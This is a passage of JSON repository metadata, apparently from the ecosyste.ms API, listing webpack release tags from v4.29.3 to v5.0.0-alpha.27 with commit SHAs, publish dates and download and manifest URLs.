webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"